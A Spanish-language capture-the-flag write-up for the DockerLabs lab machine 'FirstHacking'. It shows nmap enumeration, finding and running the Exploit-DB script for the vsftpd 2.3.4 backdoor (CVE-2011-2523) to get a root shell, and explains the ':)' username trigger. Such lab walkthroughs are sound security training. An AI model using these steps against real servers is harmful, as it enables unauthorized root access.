FirstHacking - Exploiting vsftpd 2.3.4 Backdoor (CVE-2011-2523)

Published on:
Updated on:

Introducción

DockerLabs es una plataforma gratuita diseñada para la práctica de hacking ético. En esta ocasión, abordaremos la máquina FirstHacking, en la cual aprenderemos a explotar una vulnerabilidad conocida en la versión 2.3.4 de vsftpd, un servicio FTP que opera en el puerto 21.

Platform: DockerLabs
Level: Very Easy

Desplegando la máquina

Primero, descargamos la máquina desde la página oficial de DockerLabs.

Yw4rf DockerLabs

Una vez descargada, veremos que viene comprimida. Procedemos a extraerla utilizando una herramienta como unzip.

Yw4rf DockerLabs

Con los archivos extraídos, ejecutamos la máquina.

Yw4rf DockerLabs

Al iniciar, se nos muestra la dirección IP del objetivo. Al finalizar, podemos detener la máquina presionando CTRL + C.

Enumeración

Target IP: 172.17.0.2

Verificamos la conectividad con el comando:

Terminal window
ping -c 1 172.17.0.2

Observamos que se trata de una máquina Linux, deducido por el valor ttl=64 (Time To Live).

Yw4rf DockerLabs

A continuación, realizamos un escaneo de puertos y servicios con Nmap:

Terminal window
sudo nmap -p- --open -vvv -sS -Pn -n --min-rate 5000 172.17.0.2 -oG firstHacking-scan
  • -p-: Escanea todos los puertos.
  • --open: Muestra solo los puertos abiertos.
  • -sS: Escaneo TCP SYN (sigiloso).
  • -Pn: Omite la detección de host.
  • -n: No resuelve nombres de host.
  • --min-rate 5000: Aumenta la velocidad del escaneo.
  • -oG: Guarda el resultado en formato grep.

Yw4rf DockerLabs

Detectamos el puerto 21/tcp (FTP) abierto. Realizamos un escaneo más específico:

Terminal window
nmap -p21 -sC -sV 172.17.0.2
  • -sC: Ejecuta scripts predeterminados.
  • -sV: Detecta la versión del servicio.

Yw4rf DockerLabs

El escaneo revela que el servicio es vsftpd 2.3.4, una versión conocida por tener una puerta trasera (backdoor).

Yw4rf DockerLabs

Buscamos un exploit en Exploit-DB. Una forma eficiente es usar la herramienta searchsploit desde la terminal:

Terminal window
searchsploit vsftpd 2.3.4

Yw4rf DockerLabs

Explotación

Usaremos el exploit vsftpd 2.3.4 - Backdoor Command Execution, disponible en Exploit-DB. Puede utilizarse manualmente o mediante Metasploit.

Yw4rf DockerLabs

Para descargar el exploit con searchsploit, ejecutamos:

Terminal window
searchsploit -m unix/remote/49757.py
  • -m: Copia el exploit a nuestro sistema local.

Yw4rf DockerLabs

Con el exploit descargado, lo ejecutamos:

Terminal window
python3 49757.py 172.17.0.2

Esto abrirá una conexión si el servidor es vulnerable. Como resultado, obtenemos acceso como root. Una vez dentro, verificamos con:

Terminal window
whoami o id

Yw4rf DockerLabs

Podemos mejorar la sesión con:

Terminal window
script /dev/null -c bash

Esto lanza una shell de Bash redirigiendo la salida estándar, útil para mejorar la interacción en algunos entornos.

Yw4rf DockerLabs

Con acceso total, damos por completada la máquina.

Resumen

La máquina expone el puerto 21 (FTP). Detectamos que utiliza la versión vulnerable vsftpd 2.3.4, que contiene una puerta trasera. Esta se activa al enviar un nombre de usuario que termina en :), lo que permite abrir una shell sin necesidad de autenticación. Usando un exploit conocido, logramos obtener acceso como root en el sistema.

FirstHacking - Exploiting vsftpd 2.3.4 Backdoor (CVE-2011-2523)

Author: Yw4rf

Link: https://yw4rf.netlify.app/posts/dockerlabs/firsthacking

© 2025 All rights reserved https://creativecommons.org/licenses/by-nc-sa/4.0/ 。

Share your thoughts